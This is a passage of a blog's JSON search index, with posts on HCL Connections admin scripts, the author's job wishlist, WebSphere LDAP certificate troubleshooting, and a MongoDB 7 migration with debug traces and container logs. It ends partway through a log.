cases.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/managing_external_dependencies_with_chezmoi/","title":"Managing External Dependencies with Chezmoi"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/tools-i-use/","title":"Tools I Use"},{"body":"I haven\u0026rsquo;t touched the Connections scripts for a long time, but I recently made some minor updates to fix compatibility issues with newer versions and added small scripts to speed up configuration. I also got the documentation script running from the menu.\nToday I addressed a common complaint about the menu system. Previously, it used only numbers for menu items, which meant that back and quit functions had different values across all submenus. This was confusing for users.\nWhile adding a new script to set the CookieSameSite custom property for the Session manager, I took the opportunity to redesign the menu. Now, pressing [b] will take you back from submenus to the main menu, and [q] will quit the script menu entirely, providing consistent navigation throughout.\nHere you can see the new main menu:\n---------------------------------------------------------------------- IBM WebSphere and HCL Connections Main Menu ---------------------------------------------------------------------- [1] Configuration [2] Security Roles [3] Check/Monitoring [4] User Profiles [5] Administration [6] Documentation [Q]uit | [H]elp Please select a number: versus the old one:\nAnd the configuration menu as example:\n---------------------------------------------------------------------- IBM WebSphere and HCL Connections Configuration Tasks ---------------------------------------------------------------------- [1] Configure DataSources (Tuning) [2] Set JVM Heap Sizes (Tuning) [3] Set SystemOut and SystemErr Log Size [4] Set Log language to english [5] AppServer Monitoring Policy [6] Set Custom Cache Parameter [7] Set JVM Trace Settings [8] Set WebSession Timeout [9] Disable x-powered-by header [10] Set CookiesSameSite [11] Change DB server and port [12] Create new Cluster members [13] Synchronize all nodes [B]ack to main menu | [Q]uit | [H]elp Please select a number: versus the former version:\n","excerpt":"\u003cp\u003eI haven\u0026rsquo;t touched the \u003ca href=\"https://github.com/stoeps13/ibmcnx2\" target=\"_blank\"\u003eConnections scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for a long time, but I recently made some minor updates to fix compatibility issues with newer versions and added small scripts to speed up configuration. I also got the documentation script running from the menu.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/connections_scripts_update/","title":"Better Navigation in Connections Scripts"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hclconnections/","title":"Hclconnections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/jython/","title":"Jython"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/scripting/","title":"Scripting"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/websphere/","title":"Websphere"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ad/","title":"Ad"},{"body":"","excerpt":"","ref":"https://stoeps.de/authors/","title":"Authors"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl/","title":"Hcl"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/ibm-software/","title":"IBM Software"},{"body":"Requirements for a new job (wishlist) Hello,\nI\u0026rsquo;m not actively seeking new opportunities at this time.\nMy career spans nearly three decades in technical roles, primarily as a mix of Senior Consultant, System Architect and Systems Engineer. My focus areas include HCL Connections on Kubernetes, WebSphere Application Server, and automation of deployment with Ansible. I was an IBM Champion from 2013 to 2019 and an HCL Ambassador from 2019 to 2025.\nMy professional experience encompasses numerous domains: Blogging, Public Speaking, Apprentice Training, Mentoring, Linux Administration, Container Technology, Systems Administration/Engineering, DevOps, Technical Architecture, Technical Solutions, Team Leadership, Product Ownership, Team Coaching, Project Management, Open Source Contribution, Infrastructure Automation, and IT Security/Penetration Testing basics.\nI\u0026rsquo;m frequently speaking at various events and congresses including Opensource/Linux, Social Connections/Let\u0026rsquo;s Connect, and IBM Connect. I\u0026rsquo;ve maintained a blog for more than 20 years at stoeps.de.\nMoving forward, I aim to balance more people-focused work involving communication and development while maintaining technical involvement. I prefer working with smaller companies and startups, though I\u0026rsquo;m open to opportunities with larger organizations if their culture is particularly appealing.\nAfter 25 years in technical roles, I value leveraging my accumulated knowledge. Positions that interest me include:\nTrainer/Apprentice Instructor Conference Speaker Workshop Facilitator Small Team Manager Team Coach Product Owner Technical Account Manager Technical/Solution Architect Project Manager System Architect Presales Engineer Security-focused roles Ideally, any role would combine open-source technologies with business applications.\nWork Environment Preferences Beyond role responsibilities, I value transparent discussions about working conditions and benefits. The following represents my professional wishlist:\nI believe genuine workplace flexibility goes beyond standard arrangements with core hours. True flexibility allows for autonomy in managing one\u0026rsquo;s schedule while ensuring responsibilities are fulfilled.\nMy workplace preferences include:\nFreedom to choose my client operating system with local admin rights Unrestricted internet access Commitment to Free/Libre Open Source Software (FLOSS) Dedicated training budget Support for open source conference participation including: Recognition that events often occur on weekends Coverage for travel and accommodation expenses Allocated work time for presentation preparation Opportunities to represent the employer at industry events Fair compensation with appropriate advancement opportunities Travel benefits such as a BahnCard 100 or at minimum a Deutschland Ticket Remote work options: Strong preference for fully remote environments For hybrid settings: At least two fixed remote days weekly Professional autonomy and trust Opportunities for skill development and mastery A culture that empowers employees to make reasonable decisions without excessive approvals Free tea ;-) For technical positions, I additionally value:\nWorking with cutting-edge technologies Dedicated \u0026ldquo;engineering time\u0026rdquo; to explore and implement new technologies If you\u0026rsquo;ve read this far and these preferences align with your organization\u0026rsquo;s approach, I\u0026rsquo;d be interested in further conversation.\nFor contact options, please visit my author profile on stoeps.de .\nCheers, Christoph\n","excerpt":"\u003ch2 id=\"requirements-for-a-new-job-wishlist\"\u003eRequirements for a new job (wishlist) \u003ca href=\"#requirements-for-a-new-job-wishlist\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eHello,\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eI\u0026rsquo;m not actively seeking new opportunities at this time.\u003c/strong\u003e\u003c/p\u003e","ref":"https://stoeps.de/authors/christoph-stoettner/job/","title":"Job Requirements"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ldap/","title":"Ldap"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ldaps/","title":"Ldaps"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sdi/","title":"Sdi"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/security/","title":"Security"},{"body":"Most of the LDAP connections from IBM WebSphere Application Server are configured with TLS. So you need to have the root certificate in the WebSphere truststore to connect.\nIn the past I had several issues where MS Active Directory certificates for LDAPS are only valid for one year. They were automatically recreated on the AD side, and the certificate is not using the domain root certificate but a self-signed one.\nLike https://help.claritysecurity.com/docs/enable-ldaps-on-an-ad-domain-controller , the instructions create a certificate template.\nI couldn\u0026rsquo;t reproduce in my demo servers the issue that some customers have with only self-signed certificates for AD LDAPS which are only valid for one year, but I tested certificates with and without templates.\nSo the certificate which is used for LDAPS after just installing the Certificate Authority looks like this: The certificate created with the described LDAPS Template (inherited from Kerberos): From my point of view, the certificate with the template has no server name in the certificate, while the one without touching templates looks promising and works as expected.\nYou need to reimport the certificate every 11-12 months to have a trusted connection.\nThere is one setting in WebSphere which can help you, ensuring that the filebased user (for example wasadmin) is always able to login.\nAllow operations if some of the repositories are down This option is disabled by default and you can enable it in ISC (https://websphere-fqdn:9043/ibm/console) or wsadmin.sh.\nISC\nOpen Security \u0026gt; Global Security \u0026gt; Federated Repositories (Configure) Enable Allow operations if some of the repositories are down wsadmin.sh\ncd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython AdminTask.updateIdMgrRealm(\u0026#39;[-name defaultWIMFileBasedRealm -allowOperationIfReposDown true]\u0026#39;) AdminConfig.save() To activate the setting you need to restart the Deployment Manager.\nNow at least the file-based WebSphere admin user (e.g. wasadmin) can always login, even when the LDAP connection is down or fails because of missing certificates.\nDisable Security to update truststore If it is already too late to set this option, you can disable the WebSphere security with wsadmin:\ncd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -conntype NONE securityoff() AdminConfig.save() Restart the Deployment Manager and open the login page on https://dmgr-fqdn:9043/ibm/console - it will just ask for a username. Login with any username.\nNow you can change any setting.\nTo finish the thoughts from above, import the new LDAP certificate for example.\nSSL certificate and key management \u0026gt; Key stores and certificates \u0026gt; CellDefaultTrustStore \u0026gt; Signer certificates \u0026gt; Retrieve from port\nIn the end, enable application security again: and restart the Deployment Manager.\n","excerpt":"\u003cp\u003eMost of the LDAP connections from IBM WebSphere Application Server are configured with TLS. So you need to have the root certificate in the WebSphere truststore to connect.\u003c/p\u003e","ref":"https://stoeps.de/posts/2025/websphere_troubleshooting_disable_security/","title":"Troubleshooting IBM WebSphere LDAP Security"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/connections-componentpack/","title":"Connections Componentpack"},{"body":"For HCL Connections 8 CR9, it is mandatory to update MongoDB to version 7. During my first migrations, I encountered some issues and would like to provide workarounds and additional troubleshooting tips to help others with this process.\nThe migration script expects the mounted mongo7-node-{0,1,2} shares in /mnt!\nUnderstanding the Default Path Configuration Check the script , where the root folder is defined. If $NFS_ROOT is undefined, it is set to /mnt.\nNFS_ROOT=${NFS_ROOT:-/mnt} To use a different path, use export before running the migration command:\nexport NFS_SHARE=/pv-connections ./mongo_migration.sh I\u0026rsquo;ve added a check for the MongoDB folder to the script. This is the snippet:\n# Check if shares are mounted to the used path if [ ! -d $NFS_ROOT/mongo7-node-0/data/db ] ; then echo \u0026#34;No Mongo DB share in $NFS_ROOT\u0026#34; exit 1 fi Alternatively, you can use the adjusted version of the script that includes this check.\nDealing with Lock Files Most commonly, we encounter .lock files in the MongoDB folders after scaling down the Mongo 5 containers. The migration script will fail if any of these files are present:\nWiredTiger.lock mongod.lock To delete .lock files from mongo7 shares, run:\nfind mongo7-node-* -iname \\*.lock -exec rm {} \\; Troubleshooting If you\u0026rsquo;re experiencing issues with the migration, here are some helpful troubleshooting steps:\nRun the script with bash -x to see the commands being executed and all variables replaced: root@hostname # bash -x mongo_migration.sh ++ date +%Y%m%d_%H%M%S + LOG_FILE=migration_20250408_094159.log + exec ++ tee -a migration_20250408_094159.log + NFS_ROOT=/pv-connections + REPL_SET=rs0 + NETWORK_NAME=mongo5-network + HOST_PORT_BASE=27010 + CONTAINER_PORT=27017 + FCV_VERSIONS=([\u0026#34;6.0\u0026#34;]=\u0026#34;bitnami/mongodb:6.0\u0026#34; [\u0026#34;7.0\u0026#34;]=\u0026#34;bitnami/mongodb:7.0\u0026#34;) + declare -A FCV_VERSIONS + declare -A container_map + docker network ls + grep -q mongo5-network + log_info \u0026#39;Starting temporary MongoDB container to retrieve replica set info (MongoDB 5.0)\u0026#39; + echo \u0026#39;[INFO] Starting temporary MongoDB container to retrieve replica set info (MongoDB 5.0)\u0026#39; [INFO] Starting temporary MongoDB container to retrieve replica set info (MongoDB 5.0) + docker run -dt --name mongo-get-host-name -p 27020:27017 -v /pv-connections/mongo7-node-0/data/db:/bitnami/mongodb/data/db:Z -e MONGODB_EXTRA_FLAGS=--replSet=rs0 bitnami/mongodb:5.0 e6f250b84d9906e1ab0193f3d417a093bc2a8cb78edbd27c21a8427f703f2527 + wait_for_mongo mongo-get-host-name + log_info \u0026#39;Waiting for MongoDB in mongo-get-host-name to be ready...\u0026#39; + echo \u0026#39;[INFO] Waiting for MongoDB in mongo-get-host-name to be ready...\u0026#39; [INFO] Waiting for MongoDB in mongo-get-host-name to be ready... + docker exec mongo-get-host-name mongosh --host 127.0.0.1 --eval \u0026#39;db.runCommand({ ping: 1 })\u0026#39; Check log files of the mongo-get-host-name container if the script shows no progress. In this example, WiredTiger.lock is in place, preventing the Bitnami container from mounting the database: root@hostname # docker logs mongo-get-host-name mongodb 07:40:30.52 INFO ==\u0026gt; mongodb 07:40:30.52 INFO ==\u0026gt; Welcome to the Bitnami mongodb container mongodb 07:40:30.52 INFO ==\u0026gt; Subscribe to project updates by watching https://github.com/bitnami/containers mongodb 07:40:30.52 INFO ==\u0026gt; Submit issues and feature requests at https://github.com/bitnami/containers/issues mongodb 07:40:30.52 INFO ==\u0026gt; mongodb 07:40:30.53 INFO ==\u0026gt; ** Starting MongoDB setup ** mongodb 07:40:30.54 INFO ==\u0026gt; Validating settings in MONGODB_* env vars... mongodb 07:40:30.59 INFO ==\u0026gt; Initializing MongoDB... mongodb 07:40:30.64 INFO ==\u0026gt; Deploying MongoDB with persisted data... mongodb 07:40:30.66 INFO ==\u0026gt; ** MongoDB setup finished! ** mongodb 07:40:30.67 INFO ==\u0026gt; ** Starting MongoDB ** {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.706+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;CONTROL\u0026#34;, \u0026#34;id\u0026#34;:20698, \u0026#34;ctx\u0026#34;:\u0026#34;-\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;***** SERVER RESTARTED *****\u0026#34;} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.706+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;CONTROL\u0026#34;, \u0026#34;id\u0026#34;:23285, \u0026#34;ctx\u0026#34;:\u0026#34;-\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Automatically disabling TLS 1.0, to force-enable TLS 1.0 specify --sslDisabledProtocols \u0026#39;none\u0026#39;\u0026#34;} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.708+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;NETWORK\u0026#34;, \u0026#34;id\u0026#34;:4915701, \u0026#34;ctx\u0026#34;:\u0026#34;-\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Initialized wire specification\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;spec\u0026#34;:{\u0026#34;incomingExternalClient\u0026#34;:{\u0026#34;minWireVersion\u0026#34;:0,\u0026#34;maxWireVersion\u0026#34;:13},\u0026#34;incomingInternalClient\u0026#34;:{\u0026#34;minWireVersion\u0026#34;:0,\u0026#34;maxWireVersion\u0026#34;:13},\u0026#34;outgoing\u0026#34;:{\u0026#34;minWireVersion\u0026#34;:0,\u0026#34;maxWireVersion\u0026#34;:13},\u0026#34;isInternalClient\u0026#34;:true}}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.708+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;W\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;ASIO\u0026#34;, \u0026#34;id\u0026#34;:22601, \u0026#34;ctx\u0026#34;:\u0026#34;main\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;No TransportLayer configured during NetworkInterface startup\u0026#34;} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.708+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;NETWORK\u0026#34;, \u0026#34;id\u0026#34;:4648601, \u0026#34;ctx\u0026#34;:\u0026#34;main\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Implicit TCP FastOpen unavailable. If TCP FastOpen is required, set tcpFastOpenServer, tcpFastOpenClient, and tcpFastOpenQueueSize.\u0026#34;} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.709+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;W\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;ASIO\u0026#34;, \u0026#34;id\u0026#34;:22601, \u0026#34;ctx\u0026#34;:\u0026#34;main\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;No TransportLayer configured during NetworkInterface startup\u0026#34;} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.709+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;W\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;ASIO\u0026#34;, \u0026#34;id\u0026#34;:22601, \u0026#34;ctx\u0026#34;:\u0026#34;main\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;No TransportLayer configured during NetworkInterface startup\u0026#34;} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.709+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;REPL\u0026#34;, \u0026#34;id\u0026#34;:5123008, \u0026#34;ctx\u0026#34;:\u0026#34;main\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Successfully registered PrimaryOnlyService\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;service\u0026#34;:\u0026#34;TenantMigrationDonorService\u0026#34;,\u0026#34;ns\u0026#34;:\u0026#34;config.tenantMigrationDonors\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.709+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;REPL\u0026#34;, \u0026#34;id\u0026#34;:5123008, \u0026#34;ctx\u0026#34;:\u0026#34;main\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Successfully registered PrimaryOnlyService\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;service\u0026#34;:\u0026#34;TenantMigrationRecipientService\u0026#34;,\u0026#34;ns\u0026#34;:\u0026#34;config.tenantMigrationRecipients\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.710+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;CONTROL\u0026#34;, \u0026#34;id\u0026#34;:5945603, \u0026#34;ctx\u0026#34;:\u0026#34;main\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Multi threading initialized\u0026#34;} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.710+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;CONTROL\u0026#34;, \u0026#34;id\u0026#34;:4615611, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;MongoDB starting\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;pid\u0026#34;:1,\u0026#34;port\u0026#34;:27017,\u0026#34;dbPath\u0026#34;:\u0026#34;/bitnami/mongodb/data/db\u0026#34;,\u0026#34;architecture\u0026#34;:\u0026#34;64-bit\u0026#34;,\u0026#34;host\u0026#34;:\u0026#34;f6ad5f9552c2\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.710+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;CONTROL\u0026#34;, \u0026#34;id\u0026#34;:23403, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Build Info\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;buildInfo\u0026#34;:{\u0026#34;version\u0026#34;:\u0026#34;5.0.24\u0026#34;,\u0026#34;gitVersion\u0026#34;:\u0026#34;f034f0c51b3dffef4b8c9452d77ede9888f28f66\u0026#34;,\u0026#34;openSSLVersion\u0026#34;:\u0026#34;OpenSSL 1.1.1w 11 Sep 2023\u0026#34;,\u0026#34;modules\u0026#34;:[],\u0026#34;allocator\u0026#34;:\u0026#34;tcmalloc\u0026#34;,\u0026#34;environment\u0026#34;:{\u0026#34;distmod\u0026#34;:\u0026#34;debian11\u0026#34;,\u0026#34;distarch\u0026#34;:\u0026#34;x86_64\u0026#34;,\u0026#34;target_arch\u0026#34;:\u0026#34;x86_64\u0026#34;}}}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.710+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;CONTROL\u0026#34;, \u0026#34;id\u0026#34;:51765, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Operating System\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;os\u0026#34;:{\u0026#34;name\u0026#34;:\u0026#34;PRETTY_NAME=\\\u0026#34;Debian GNU/Linux 11 (bullseye)\\\u0026#34;\u0026#34;,\u0026#34;version\u0026#34;:\u0026#34;Kernel 4.18.0-553.45.1.el8_10.x86_64\u0026#34;}}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.710+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;CONTROL\u0026#34;, \u0026#34;id\u0026#34;:21951, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Options set by command line\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;options\u0026#34;:{\u0026#34;config\u0026#34;:\u0026#34;/opt/bitnami/mongodb/conf/mongodb.conf\u0026#34;,\u0026#34;net\u0026#34;:{\u0026#34;bindIp\u0026#34;:\u0026#34;*\u0026#34;,\u0026#34;ipv6\u0026#34;:false,\u0026#34;port\u0026#34;:27017,\u0026#34;unixDomainSocket\u0026#34;:{\u0026#34;enabled\u0026#34;:true,\u0026#34;pathPrefix\u0026#34;:\u0026#34;/opt/bitnami/mongodb/tmp\u0026#34;}},\u0026#34;processManagement\u0026#34;:{\u0026#34;fork\u0026#34;:false,\u0026#34;pidFilePath\u0026#34;:\u0026#34;/opt/bitnami/mongodb/tmp/mongodb.pid\u0026#34;},\u0026#34;replication\u0026#34;:{\u0026#34;replSet\u0026#34;:\u0026#34;rs0\u0026#34;},\u0026#34;security\u0026#34;:{\u0026#34;authorization\u0026#34;:\u0026#34;disabled\u0026#34;},\u0026#34;setParameter\u0026#34;:{\u0026#34;enableLocalhostAuthBypass\u0026#34;:\u0026#34;true\u0026#34;},\u0026#34;storage\u0026#34;:{\u0026#34;dbPath\u0026#34;:\u0026#34;/bitnami/mongodb/data/db\u0026#34;,\u0026#34;directoryPerDB\u0026#34;:false,\u0026#34;journal\u0026#34;:{\u0026#34;enabled\u0026#34;:true}},\u0026#34;systemLog\u0026#34;:{\u0026#34;destination\u0026#34;:\u0026#34;file\u0026#34;,\u0026#34;logAppend\u0026#34;:true,\u0026#34;logRotate\u0026#34;:\u0026#34;reopen\u0026#34;,\u0026#34;path\u0026#34;:\u0026#34;/opt/bitnami/mongodb/logs/mongodb.log\u0026#34;,\u0026#34;quiet\u0026#34;:false,\u0026#34;verbosity\u0026#34;:0}}}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.713+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22270, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Storage engine to use detected by data files\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;dbpath\u0026#34;:\u0026#34;/bitnami/mongodb/data/db\u0026#34;,\u0026#34;storageEngine\u0026#34;:\u0026#34;wiredTiger\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:30.713+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;I\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22315, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Opening WiredTiger\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;config\u0026#34;:\u0026#34;create,cache_size=23480M,session_max=33000,eviction=(threads_min=4,threads_max=4),config_base=false,statistics=(fast),log=(enabled=true,archive=true,path=journal,compressor=snappy),builtin_extension_config=(zstd=(compression_level=6)),file_manager=(close_idle_time=600,close_scan_interval=10,close_handle_minimum=250),statistics_log=(wait=0),verbose=[recovery_progress,checkpoint_progress,compact_progress],\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.216+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;E\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22435, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;WiredTiger error\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;error\u0026#34;:11,\u0026#34;message\u0026#34;:\u0026#34;[1744098031:216706][1:0x7f9b2d09fc80], wiredtiger_open: __posix_file_lock, 393: /bitnami/mongodb/data/db/WiredTiger.lock: handle-lock: fcntl: Resource temporarily unavailable\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.216+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;E\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22435, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;WiredTiger error\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;error\u0026#34;:16,\u0026#34;message\u0026#34;:\u0026#34;[1744098031:216813][1:0x7f9b2d09fc80], wiredtiger_open: __conn_single, 1807: WiredTiger database is already being managed by another process: Device or resource busy\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.217+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;E\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22435, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;WiredTiger error\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;error\u0026#34;:11,\u0026#34;message\u0026#34;:\u0026#34;[1744098031:217338][1:0x7f9b2d09fc80], wiredtiger_open: __posix_file_lock, 393: /bitnami/mongodb/data/db/WiredTiger.lock: handle-lock: fcntl: Resource temporarily unavailable\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.217+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;E\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22435, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;WiredTiger error\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;error\u0026#34;:16,\u0026#34;message\u0026#34;:\u0026#34;[1744098031:217370][1:0x7f9b2d09fc80], wiredtiger_open: __conn_single, 1807: WiredTiger database is already being managed by another process: Device or resource busy\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.217+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;E\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22435, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;WiredTiger error\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;error\u0026#34;:11,\u0026#34;message\u0026#34;:\u0026#34;[1744098031:217845][1:0x7f9b2d09fc80], wiredtiger_open: __posix_file_lock, 393: /bitnami/mongodb/data/db/WiredTiger.lock: handle-lock: fcntl: Resource temporarily unavailable\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.217+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;E\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22435, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;WiredTiger error\u0026#34;,\u0026#34;attr\u0026#34;:{\u0026#34;error\u0026#34;:16,\u0026#34;message\u0026#34;:\u0026#34;[1744098031:217898][1:0x7f9b2d09fc80], wiredtiger_open: __conn_single, 1807: WiredTiger database is already being managed by another process: Device or resource busy\u0026#34;}} {\u0026#34;t\u0026#34;:{\u0026#34;$date\u0026#34;:\u0026#34;2025-04-08T07:40:31.218+00:00\u0026#34;},\u0026#34;s\u0026#34;:\u0026#34;W\u0026#34;, \u0026#34;c\u0026#34;:\u0026#34;STORAGE\u0026#34;, \u0026#34;id\u0026#34;:22347, \u0026#34;ctx\u0026#34;:\u0026#34;initandlisten\u0026#34;,\u0026#34;msg\u0026#34;:\u0026#34;Failed to start up WiredTiger under any 